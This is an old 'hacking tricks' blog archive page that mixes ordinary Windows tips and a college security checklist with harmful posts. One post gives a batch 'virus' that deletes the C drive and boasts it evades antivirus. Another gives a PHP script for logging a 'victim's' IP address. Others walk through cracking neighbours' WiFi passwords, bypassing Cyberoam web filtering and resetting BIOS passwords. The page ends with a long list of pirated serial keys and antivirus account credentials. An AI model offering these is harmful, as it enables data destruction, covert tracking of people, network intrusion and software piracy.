Pages

Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

Tuesday 1 July 2014

How to Create your Own RUN Command



Step 1: Select the software for which you want to make custom Run command. For example, let us consider Mozilla Firefox. You may use any application or software other than which is already there in Run command.

Step 2: In next step Right click on the desktop and make a new Shortcut.

Step 3: As you select the Shortcut, it will open up a dialog box asking the path of the application or software for which you want to create

Step 4: Now you need to provide the path of the application's .exe file i.e. "firefox.exe". It can be found out in the C drive under Program files.

Step 5: After that just provide a relative name for the Shortcut that means rename it with the name which will be used as your Run command. For example, "ff" for Firefox.

Step 6: Now click on Finish button. Then the shortcut of respective application will be created on your desktop screen.

Step 7: In the next step just cut and paste the created Shortcut into the root drive i.e. C:/Windows/. For this make sure you are the administrator of the computer.

Step 8: Now, you are done with the process of creating the Run command and you can Open Run Command and type "ff" to open Mozilla Firefox application.

Similarly you can perform above steps to Create Run Command for various other Programs too.

How to create new Partition without Formatting a Hard Disk



If your Hard-disk contain 3 partitionsin your PC and you need to create 1 more partition then what will you do? Most of people are doing the following methods to create new partition in Hard-disk.

Format the Hard-disk and create a new partition. Let’s see an easier method to create a new partition without formatting a Hard-disk.

To do this we don’t need any software and also no need to copy the data to separate drives. By doing the following methods we can create a New Partition from System Drive.

Right Click on My Computer

Click Manage

Now “ Computer Management” window will appear.

In that window Click Storage

Then select Disk Management.

In that window Hard-disk and other Storage Media detail will be shown.

Now select a Disk drive to create a New Partition.

Right Click on particular Drive then Click Shrink Volume.

Now windows will show the free space in particular partition.

Type the disk size to create New Partition in Shrink Window.

Now click on “Shrink” , within few seconds a New Disk will be created.

Still Accessible is not done in New Disk.

Now Right Click on Unallocated Drive . Select New Simple Volume.

Click on Next. Now give a size to the New Partition. (you can choice wholesize right now)

Select a Drive letter and Click on Next.

Then select Format Setting ->

File System ->

NTFS. And keep others as default. (if you need you can change this)

Put a tick on “Performances a Quick Format” and Click on Next.

Now the New Partition is created successfully.

How To Reset Or Remove Bios Password....


Many people use BIOS password to lock up their computers, making them completely unusable without entering the correct password. This password has to be entered before loading the operating systems, normally on a DOS screen shortly after the computer started. BIOS password is usually stored together with other BIOS settings such as the time, date and size of the hard disk. These pieces of data are usually stored in a flash chip on the motherboard.

To reset or remove BIOS password, look for a jumper which usually can be found near the processor or BIOS battery on the motherboard. After locating the jumper (usually with a label - PSWD beside it), move the jumper from connected pins 1+2 to pins 2+3 for a few seconds or so, then move back to pins 1+2. This will reset the entire BIOS settings. The next time you boot your computer, the BIOS will show you the default factory settings and from there you can optionally set a new password.

Here are the Commands :
Type debug
Type o 70 2e
Type o 71 ff
Type q
By Putting this commands your Machine's Bios has been reset. Now restart your computer and everything should run just fine.

Another alternative way to completely reset your bios setting is to reinsert the CMOS battery which can be found on the motherboard. The CMOS battery provides power supply to the motherboard in order to hold the BIOS settings data.

Sunday 19 January 2014

Setting Video As Desktop Wallpaper


video wallpaper
Ever wanted to set cool videos as yourcomputers Desktop Wallpaper, then you came to right place. Today in this post i will teach you how to set videosas your Desktop Wallpaper with a simple nice little trick and small tool or software that mostly every one has installed on their computer or laptop. This trick works on  Windows Xp as well as it works on windows 7. Go through below post to learn this simple trick.



How to set video as desktop wallpaper ?

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper


   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

Password Protect Any Folder Without Any Software

In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

How To Grab Someone IP Address ?


In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?

    1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

    <?php
    $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $img_number = imagecreate(400,95);
    $backcolor = imagecolorallocate($img_number,10,102,153);
    $textcolor = imagecolorallocate($img_number,255,255,255);

    imagefill($img_number,0,0,$backcolor);
    $number0 = " This is Your IP/Proxy";
    $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
    $number2 = " Host/Proxy: $hostname";
    $number4 = " _________________________________";

    Imagestring($img_number,10,5,5,$number0,$textcolor);
    Imagestring($img_number,10,5,25,$number1,$textcolor);
    Imagestring($img_number,10,5,45,$number2,$textcolor);
    Imagestring($img_number,10,5,50,$number4,$textcolor);
    Imagestring($img_number,10,8,50,$number4,$textcolor);
    Imagestring($img_number,10,5,10,$number4,$textcolor);
    Imagestring($img_number,10,8,10,$number4,$textcolor);

    header("Content-type: image/png");
    imagepng($img_number);
    $file=fopen("Name-here-to-protect-the-File.txt","a");
    $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
    fwrite($file, $file2);
    fclose($file);
    ?>

          2. Now make Free account on any of  the free web hosting sites Ripway or on My3gb .
          3. Now Upload Grab.php to your web hosting site.
          4. Copy the link of your  uploaded file and send it to victim.
          5. As soon as victim will click on your link his ip will be saved in your free web hostingsite.
          6. Enjoy you are Done !!

        Finding Ip Address Of A Website Using Command Prompt Or CMD

        In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

        How to find IP ?

        1. Go to Start > Type CMD and press Enter.
        2. Now write Ping followed by website URL whose IP you want to find.
        finding ip adddress of website

        3. It will take less then a second and come up with the results as shown below.
        finding ip adddress of website

        In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

        Learn To Make Dangerous Virus In A Minute

        computer virus
        In my previous post i had teach you guysto create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet verypowerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

        What will this virus do ?  

        You will create this virus using batch file programming. This virus will delete the C Drivecompletely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

        How to Make the virus ?

           1. Open Notepad and copy below code into it.

        @Echo off
        Del C:\ *.* |y

           2. Save this file as virus.bat (Name can be anything but .bat is must)
           3. Now, running this file will delete all the content of C Drive.


        Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

        Saturday 18 January 2014

        Making Nameless Folder In Windows

        creating nameless folder
        In this small tutorial i will show you a smilpe windows trick. Basically you can not makefolder with no name on windows. This trick will allow you to make folder without any name. This trick works on any windows  operating system.


        How To Make Nameless Folder

        Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
        creating nameless folder
        1. Make a Newfolder on desktop or where ever you want.
        2. Right click on this newly created folder and select Rename.
        3. Erase the text showing "New Folder".
        4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
        5. After that leave alt key and Press enter.
        6. Done you just created nameless folder.

        Learn To Hide Files Behind The Images


        hide files behind images

        There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but intodays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

        How To Hide File Behind Image ?

        In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
        1. Select an image to be used for hiding file behind the image.
        2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
        3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
        4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
        cd desktop
        hide files behind images

        5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
         Copy /b imagename.jpg + filename.rar finalimage.jpg
        hide files behind images
        • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
        • Replace filename with name of your file you want to hide. It must be in .rar format.
        • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
        6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

        How To Access Hidden File ?

        To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

            1. Open winrar
            2. Now locate your image and open it or simply drag your image in winrar.
            3. Extract the file and done.

        Wednesday 25 September 2013

        Cybersecurity Tips for College Students

        It’s that time of year again. When students start their college journeys, or return for another academic year. And the last thing any student wants to be worrying about is cyber security. Here’s our top tips, so you can check them off your list and get on to the good stuff this semester. And don’t forget to snag your free 6 months of LastPass Premium with our education promotion: https://lastpass.com/edu

        Lock that computer - and your phone.

        Have you secured your devices, both physically and digitally? Most devices come with an auto-lock feature, requiring that you re-enter your password or pin code (avoid birthdays or other personal information). Also physically lock down your computer by investing in a cable lock, which allows you to secure it to a desk, reducing the chances of theft.

        Avoid sharing too much.

        Keeping your friends updated and sharing memories via social media may seem like second nature these days. But what you share could tell someone too much - such as indicating when you’re not at home, making you a target for burglary. Be sure you’ve set the appropriate privacy settings on your accounts, and be mindful of the data points you share.

        Secure your email.

        Your email account will be the hub of your college experience. Think of all the sites and services you use that email address for, and the network you’ll build with it. Never share your email password with anyone - and we mean anyone, including close friends. Use a unique password, and if it’s available, enable multifactor authentication for your email account.

        Generate & protect your passwords.

        Speaking of passwords, ensure that all of your passwords are strong, unique, and known only to you, by using a password manager like LastPass. LastPass helps centralize the management of your passwords to one easy-to-use vault. It will also help you generate a mean-looking password when signing up for a new account. It’s free - and you’ll be surprised how many accounts you’ll accumulate over the years, so start now.

        Keep software up to date.

        Shutting down your browsers, and your computer itself, will initiate most automatic updates for your computer. But those annoying pop ups and messages from your task bar? We recommend responding to them when they appear. The updates include important fixes and improvements - sometimes addressing serious security issues, so don’t put off responding to them.

        Limit your activities on open WiFi.

        Free WiFi is your lifeblood in college. Even if your campus’ network itself may be password-protected, you never know who’s on the network with you. Limit your access to sensitive accounts (such as banking) when you’re on these networks. Consider using a VPN when you’re using open WiFi as well, which will allow you to surf anonymously and lock down your connection.

        Prepare for loss.

        Although we’re all about being proactive and managing risk, sometimes bad things happen. The best thing you can do is prepare for that loss - of your computer, your smartphone, any of your gadgets. Backup your documents and photos on a regular basis. Look into installing software that lets you remotely access your computer or phone, so you can wipe it if needed. Also look into software that lets you track your lost device, so you have a greater chance of recovering it.

        To recap what we’ve covered, here’s your full checklist:

        • Set your computer to auto-lock.
        • Set your smartphone’s pin code.
        • Invest in a cable lock.
        • Err on the side of caution when sharing online.
        • Set appropriate privacy options, so you’re only sharing with friends.
        • Use a strong password for your email account.
        • Don’t share your email login with anyone.
        • Look into security features available for your email account.
        • Use a password manager like LastPass to manage your accounts.
        • Generate unique passwords to avoid password reuse.
        • Respond to all prompts to update your software.
        • Restart your computer occasionally to ensure updates are completed.
        • Use a VPN if you need to access personal accounts on open WiFi.
        • Be mindful of the connection you’re using and what you’re doing on that connection.
        • Install tracking software on your computer and smartphone.
        • Enable remote wiping of your device, if possible.
        • Back up everything to an external hard drive, regularly.
        And last but not least, redeem your free Premium credit here: https://lastpass.com/edu once you’ve signed up for LastPass. LastPass Premium gives you full access to our mobile apps for smartphones and tablets, as well as additional security and productivity features.

        Wednesday 31 July 2013

        How to Hack WiFi Password Easily


        How to Hack WiFi Password Easily, A brief tutorial to hack WiFi Password Easily : Internet has becoming a basic need of a person’s life and with the invention of new tech devices, this term looks an essential one. If you are an Internet junky, you must have some kind of good knowledge of it. You can do anything from the net, there’s no need to go anywhere to do the things. Apart from this, you must have known that almost everyone uses a Wi-Fi router to use the Internet. People have set their own password to connect to the Net. You are here, to know that how to hack WiFi Password Easily and following tutorial will teach you the exact way of cracking a Password of a particular WiFi connection. Take a look!
        First thing you need to know is there are two ways of securing a WiFi connection. First is WEP and the other is WAP. These are the short forms of the privacy terms in WiFi security. In which WEP stands for Wire Equivalent Privacy and WAP stands for Wireless Application Protocol. Here, WEP can be easily hacked by a normal people too whereas WAP is the most used security option by many. Almost everyone uses WAP security to keep their WiFi connection safe. Le’ts see the very easiest way of hacking a WiFi Password easily. Following are the useful steps.
        This trick works on a USB Pendrive and hence you need to have the same. You got to make a bootable flash drive to use this technique and hence make sure you manage these much things.

        How to Hack WiFi Password Easily :

        Step 1 :
        First thing is USB Pendrive. Keep a preferable USB Pendrive to move with this process.
        Step 2 :
        Download beini.iso file to start the process. This file is essential to use this trick and the following link will redirect you to the Download page.
        Download beini.iso software 
        Step 3 :
        Download  UNetbootin software to accomplish this process. You can download this software from the following link.
        unetbootin-windows-583.rar
        Step 4 :
        UNetbootin launch this software and write beini.iso file in the USB Drive.
        unetbootin
        Step 5 :
        You can see a separate page of your booting. Make sure to select your current operating system from the bootable drive.
        Step 6 :
        After completing this, reboot your system from USB drive.
        Step 7 :
        If everything’s Okay with the process, you can have a special Minidwep-gtk logo to your PC’s system tray.
        Step 8 :
        Click on to the above given option and it will ask you for your permission whether to move on or not. Click on to Ok option to move further.
        Step 9 :
        Now, Minipwep-gtk program will run on your PC with a new Windows and some useful sections.
        Step 10 :
        From right side bar click on to Scan option. This process will scan all the working WiFi connections nearby your place.
        Step 11 :
        There you can have a list of all the WiFi networks. Make sure to select a proper one and then click on to launch button.
        Step 12 :
        Cracking process will take place by now and this time it will take a few seconds to crack the WiFi connection.
        Step 13 :
        If you’re good with the process you have a Password written on that separate Window.
        Step 14 :
        Now scan for the WiFi connection and make sure to choose the cracked one. Click on to connect button, enter the above cracked password and select Ok. You’re done!
        There are numerous ways and tons of software available to help you cracking a WiFi connection. However, people can’t find a relevant ones and hence we have enlisted this simpler one here in this tutorial. You can go with the above software. After complete downloading the above given file and software, start the process and crack the password now!
        So folks, this is exactly what you need to do to hack WiFi password. You may have some problems while using this trick, however this the only option you have left. To becoming a hacker, you need to have at least this much knowledge to building a career in this filed. Use all the above mentioned steps wisely and connect to the free Network now!

        How to Delete / Remove New Folder.exe Virus from Pendrive (USB Drive)


        USB drives are there to carry your Important data from one PC to the other one. Moreover, it is the only possible way to share viruses from one PC to the other one. Yes, many of you people might have noticed that, when you attach this USB drive to your PC, you would have some files named as New Folder.exe etc. This is the virus. It can be a harmful one if you don’t know how to handle it. Sometimes, to remove this you need to format your entire hard drive. Many of the people do the same thing to remove such viruses. Do you know that, you can remove such viruses manually from your PC? Take a look!
        Yes, you heard it right. You can get rid of such unwanted and harmful viruses from your PC by your own. here, we’ll be guiding you how you can remove such New folder.exe viruses from your Pen drive or we can say USB Drive.

        How to Delete / Remove New Folder.exe Virus from Pendrive :

        Step 1 :
        Whenever you attach a USB drive to your PC, there comes a pop-up window saying open folder to view files. From there do not click on to OK button, just select Cancel button.
        TekPur
        Step 2 :
        Now, open the Command Prompt by typing ‘cmd‘ in the run box
        Step 3 :
        drive letter: in the command prompt and press Enter button once.
        Step 4 :
        After that type, dir /w/a command from the same window and press Enter button.
        Step 5 :
        There comes a list of all viruses present on your USB Drive. Like below ones.
        • svchost.exe
        • Heap41a
        • Autorun.inf
        • Ravmon.exe
        • New Folder.exe
        If there’s any option from the above mentioned names, that means your Drive is highly affected by virus.
        Step 6 :
        attrib -r -a -s -h *.* put this command in the command prompt and press Enter.
        Step 7 :
        This command will automatically remove some kind of viruses from your USB Drive directly.
        Step 8 :
        Now, you have to delete viruses manually just by typing del filename command and press Enter.
        If you have a virus named New Folder.exe, enter del New Folder.exe and press Enter to delete it from your Drive. Simple?
        This is how you can remover/ delete viruses from your Pendrive or USB Drive without formatting it. Give it a try, learn and teach your friends too. We’ll be back with some more interesting and useful tips to make you more smarter and way ahead from the others.

        Saturday 27 July 2013

        How To Open Website Which Is Blocked By Cyberoam ?

        So Here i am going to tell you easiest method for how to bypass cyber roam to block some site !


        Its Rajesh Lagishetty
        Facebook Hash Tag #smartvmp

        website : http://rajeshlagishetty.blogspot.in/




        OK !!    
        How to bypass cyberoam-smartvmp

        Things you needed are:

        Proxyfier Latest edition ! download from Here.
        Now Find and note your ip adress from below image.



        My IP Address


        If ip address is not found,note down from login panel of cyberoam from browser;see url and its like 192.168.10.1 Or my be different.

        Then install setup and go to the register copy key from proxyfierkey.text file and paste !

        Now click on profile -> proxy server -> add->address:192.168.10.1(or from above image)  Port:3128

        Then

        Test !

        You are done ! For demo open adfoc.us is web site for ads and cyberoam blocked it now click on
        proxyfier and then you are able to open site !

        you are able to open ANY site !

        Regard us via like us on facebook ! NO BARRIER ON CARRIER page !

        See video For more Details:



         http://www.youtube.com/watch?v=jcyV5civB8g&feature=player_embedded


        Serial keys of all the major software 2013

        Here we have serial keys of many software like VMware Workstation 9.X,Microsoft Office 2013,Power DVD v5.0,AUTO CAD 2013,Adobe Photoshop etc.. This is possible with the help of cyber elite group.

        ╚═►VMware Workstation v9.X ◄═╝



        Serial Key:→↓


        ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF

        VY19K-01X5L-084MY-MXMZG-MAUF2
        YA5X2-FEFDK-H80VQ-4YWQC-MPARD
        YU1WA-F1GD7-485UQ-ADNNT-XCAR6
        GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
        AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
        YG5EK-D1X8L-088XY-NNQEC-P3AW6
        VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
        ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
        GC1WK-F8XEM-M812P-9WMG9-XUU9F
        AY540-00W0M-088DY-GDQ7T-QL8Z8
        FF34U-A5W11-H80UP-F6WNV-NL8V6
        CF71K-AGD52-H894Q-Q4P7E-XL2R6
        YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF


        ========================================================================

        ╚═►NovaPDF Professional Desktop v7.7.387◄═╝


        Name : Dennis Anker

        Serial: B11F-8V0T-XRU2-Z344-4MDF-2WM5-6XEB-NHK4


        ========================================================================


        ╚═►Microsoft Office 2013◄═╝


        S/N: 9MBNG-4VQ2Q-WQ2VF-X9MV2-MPXKV


        ========================================================================




        ╚═►PowerDVD v5.0◄═╝


        S/N: MV588995988G2285



        ========================================================================

        ╚═►Active Partition Recovery Enterprise v8.0◄═╝


        Registered Name: Bernhard Walder

        Registration Key: 00001Q-RB25T2-24ZXFW-WVDC84-RCD4EQ-YWMDZ6-MD61TD-VQ4VMU-87UDC3-5JB9DX-8NJMPA



        ========================================================================

        ╚═►AUTO CAD 2013◄═╝


        sl no= 110-10061620, product key= 781E1


        ========================================================================

        ╚═►Internet Download Manager v6.15.1 Serial◄═╝


        First Name: Anything
        Last Name: Anything
        Email: Anything
        Serial: 7G7QY-NZWKQ-23KRA-RAMQ4


        ========================================================================

        ╚═►Registry Workshop v4.6.2◄═╝


        Serial Key:→↓

        01CBC4B66A06969B2638235982DED475E724C63B3D32A13286D226D99703423AA060156394800258D5EF54FCCFB52306C7A2AA1D44A028E17E2833D3CC70F31E


        ========================================================================

        ╚═►USB Disk Security v6.2.0.30 Serial Key◄═╝


        ACADEMIC
        18027
        ------------------------------
        ABUTTER
        18011
        ------------------------------
        ABRAZITE
        17950
        ------------------------------
        ABRADE
        17875
        ------------------------------
        WIRING
        17820


        ========================================================================

        ╚═►Advanced Archive Password Recovery Pro v4.53◄═╝


        ↓→:Serial Key:→↓

        ARCHPRP-NWGTN-45653-DXZWD-93326

        ARCHPRP-LEHKE-58253-RHCZW-73269n


        ========================================================================

        ╚═►Internet Download Manager v6.14.3◄═╝


        First Name: Any Name

        Last Name: Any Name

        Email: Any Email

        Serials:

        7G7QY-NZWKQ-23KRA-RAMQ4

        or

        D4B22-SWRY9-FLFVP-NETDI


        ========================================================================

        ╚═►ImTOO Video Converter Ultimate 

        v7.7.0.20121224◄═╝


        ←↓→:Serial Key:→↓←

        3A17-E5E5-C390-A079-39A9-E3EA-80A4-6C62
        CB28-7E7E-5CA1-B182-F8A7-0041-D754-4B55
        A5C6-1818-3A4F-5F69-E202-75D0-89ED-FC87
        C3A1-7E8E-5C39-3A00-7C33-822B-389B-44D3
        1BC5-E0E7-92BC-BC56-1161-A53D-F9E7-918D
        A18F-5C6C-3A17-18EB-34FC-2042-46A4-5695
        816C-5A5A-38E7-17C3-9E64-05A5-257B-02BF


        ========================================================================


        ╚═►FutureDecks DJ Pro v3.0.5◄═╝


        Serial Key:→↓

        759P4A3S56MN
        M669C575KC43
        L7NNSFL5MPPK
        99765CLCKHK5
        F9K65L35C5C5


        ========================================================================

        ╚═►avg internet security 2013◄═╝


        Licence: 8MEH-RFR8J-PTS8Q-92ATA-O4WHO-JEMBR-ACED


        ========================================================================

        ╚═►Microsoft Windows 8 RTM◄═╝


        ---------------Key:--------------------

        6CNK2-RTVRV-TXYQK-86DBM-B4DHC
        3HBY3-3GNXP-22R96-CCMCB-HT67C
        KGQND-Q2HH6-XHXHC-89VWW-82KVC
        F2V7V-8WN76-77BPV-MKY36-MKH3P


        ========================================================================

        ╚═►Adobe Photoshop Lightroom v4.3◄═╝


        Serial Key: →↓

        Name: mahn
        Serial: 1160-4808-4026-5497-2931-5822

        Name: Flash Gordon
        Serial: 1160-4859-8564-6751-6040-3185

        Name: Green Lantern
        Serial: 1160-4254-4822-7250-4150-5688


        ========================================================================



        ╚═►Any Video Converter Ultimate v4.5.8◄═╝


        Name: LiveLong

        Serial: 0000KZ-KFQ4Q5-21UJ38-7AB787-812BM7-209R1A-DNTPG7


        ========================================================================

        ╚═►TeamViewer Premium 5.1.9290 serial number ◄═╝


        s/n: 09-31004-61457-936046


        ========================================================================

        ╚═►Photoshine Serial Key ◄═╝


        name :ACPJ0020C4E

        serial : A0JJ8022CFB


        ========================================================================

        ╚═► PowerISO 5.4◄═╝


        Name: PowerISO

        Serial: M9PHF-E3AK2-Q166Y-DAQ1H-TVXVJ



        ========================================================================

        Kaspersky Internet Security 2013 License Key :-


        Use One Of This Activation Code To Get 90 Days License →↓

        4GGYH-S7HEJ-QEGXT-4C88H

        (OR)

        QCGUH-J8FF6-33WGA-UBY62


        ========================================================================

        ╚═►TuneUp Utilities 2013 v13.0.2020.15◄═╝


        Serial Key: →↓

        FC661R-DA19J6-9WFX5T-79RYJX-DX6T1Y-A9K5E3

        WVACTK-RNWVQ9-AK1YVC-Y07WYB-TB9Y5H-FVHFA8

        C9ATBK-F4CXJE-H60MH3-NHXPKQ-80RPB9-0KF6V2

        99VV7M-KRN8PK-4PDPX4-KY9Y7T-Q7TQ34-WJ5AKD

        HNBHQA-B3QEWW-4Y6TWC-KXDRT8-QR4591-CRTV8H

        9H2JWP-YPKKAM-3M8TAD-J82PYB-55WMFN-N5K428

        8DRYX9-B4AKRK-CTH3TE-N0QFY1-RX777P-TTRKC6

        MWETXX-RA0TAM-J570RF-YFHNW9-VMEVV0-60666M




        ========================================================================


        Avast! AntiVirus v7.0.11 License Key Expiry Date 

        (2038) :- 


        C2092321R9946A0912-U52DEWK3

        OR

        C2092321R9946A0912-U52DEWK3


        ========================================================================

        ╚═►Flash Player Pro v5.4◄═╝


        Name: LiveLong
        Serial: LdfFla-23B9AC7E23E323AA6E448A9BD65AADFB


        ========================================================================

        ╚═►Hide Files and Folders v3.5◄═╝


        Serial Key: →↓

        a66e44fe14a7fcd5
        be8054ffac8c3d28
        3d5cbbdd6049fe6b
        788887cd0bbcf8e2
        fd434bde7a94fe93



        ========================================================================

        ╚═►Nitro PDF Professional Enterprise 8 v8.0.6.3◄═╝


        Serial: →↓

        NP8D95K4GG0610986CC
        NP8D28K08K861091A52
        NP8D8F04GSK619D6560
        NP8D98G4XKS61068817
        NP8DD60C8S061FC5394
        NP8D23CX8C8612FA36D
        NP8DCD8GOK4610DCCA4
        NP8D03S4SGK612D6DA0
        NP8D772561161D133E8
        NP8D764G84C61247501
        NP8D2F4KXC861F6DFBA
        NP8D03C80SK613F59AA
        NP8D20KSX08613BF266
        NP8DCD4COS46100F9C6
        NP8D52G00O0614E8C6C
        NP8D772561161D133E8


        ========================================================================


        ╚═►SUPERAntiSpyware Professional v5.6.1014◄═╝


        Serial Number: 322-412-2500
        Activation Code: 60c2-7e0c-10ad-329d

        Serial Number: 395-790-9638
        Activation Code: b8b9-f84b-0e4d-dd7d

        Serial Number: 109-577-0923
        Activation Code: ca2c-0423-1199-78f0


        ========================================================================


        ╚═►Office 2010 professional plus Serials◄═╝


        BDD3G-XM7FB-BD2HM-YK63V-VQFDK
        W3BTX-H6BW7-Q6DFW-BXFFY-8RVJP
        DX4MW-PB7F4-YR4WT-BV3MM-4YV79
        6D739-9F4F2-BKKV8-YCHRF-PWR8B
        4C9PX-DH3G9-D424D-FGGKF-PRWH3
        W3G79-KFKR2-M9C86-JG748-G8373


        ========================================================================


        ╚═►Avast 5+6+7 serial ( Free )◄═╝


        S/N: W6754380R9978A0910-4TZ59467


        ========================================================================


        ╚═►USB Drive Antivirus V.3.02 Build 0509◄═╝


        1. NAME-USB Antivirus
        Serial-WWHKZY
        ---------------------------
        2. NAME-User
        Serial-WWKZ
        ---------------------------
        3. NAME-Rock_OM
        Serial-TSIS
        ---------------------------
        4. NAME-Frendz
        Serial-HVKVN


        ========================================================================


        ╚═►Corel Graphic Suit X6◄═╝


        S/N: DR16R22-LZA9ZQN-6HPW8RX-6QTKYZ


        ========================================================================


        ╚═►Corel Video Studio 12 Serials ◄═╝


        VS14R22-PZ9U4XB-4USTVDL-PEPLKE2

        VS14R22-D3466GB-UUS6K43-7EQW6UW
        VS14R22-PR6QWBP-GUCYVNG-UKSQJHA
        VS14R22-T5525UA-V4EG9DR-P6TB6UE
        VS14R22-UYC4CTQ-BPQJT25-WTT4SPS
        VS14R22-9LHHX33-ZP4N5P4-SBM7HGS
        VS14R22-D8YUMAB-A2Q3YNE-HMQWNWE
        VS14R22-R5BNPCQ-DKY26BT-DPY6C9J
        VS14R22-QKDXPFN-YRVKL2E-HGZRG6E

        ========================================================================



        ╚═►Super DVD Factory v5.7 ◄═╝


        Name: freeserialkey

        Serial: 1199BA01C9C8B64244B4A42A662A723A2CBF089A005BE4CF26AE68FCCF22992A0E9CF910CF06804A6686148DFD58C8293818E5268FB78439C578DAAD2A87BFFF2F60CC40A24D7C4707A8A8A572431074A008160333830C862C73D3BAC576CF11803C0D84142979EC5834921FE9C4E63896150A4F3EC32C61028A1F493D0003C5


        ========================================================================



        ╚═►Virtual DJ 6◄═╝


        Serial: WBBS-UCHF-UBBLG


        ========================================================================



        ╚═►Sony Sound Forge 7.0.0.262◄═╝


        SN : HQ-EM4R8P-7S407G-S93NCR


        ========================================================================



        ╚═►ADOBE PREMIERE PRO CS4 SERIAL KEYS◄═╝


        1132-1033-0380-3409-5427-6334


        1132-1686-5385-1891-1718-6945


        ========================================================================



        ╚═►Quick Heal Total Security version: 13.00 

        (6.0.0.4)◄═╝


        Serial: VNI4-GACF-2358-RSUW


        ========================================================================



        ╚═►Avira internet security 2012 until 19 April 2013

         key :◄═╝


        Serial: P3WWW-WWWT3-PJHYD-CNCJ3-7973S


        ========================================================================



        ╚═►ESET SMART SECURITY 4 and 5,6 !◄═╝


        Username: EAV-71746858

        password : kbbmak3xen
        06-12-2012

        Username: EAV-71549467

        password : 8ad8k72nbm
        04-12-2012

        Username: EAV-72535882
        Password:j2jfk4u6pe
        Expire:21-10-2012

        Username:EAV-72535886
        Password:xbjaarhjs5
        Expire:21-10-2012

        Username:EAV-72535888
        Password:h6sb4ctejc
        Expire:21-10-2012

        Username:EAV-72535884
        Password:rmjcev7tra
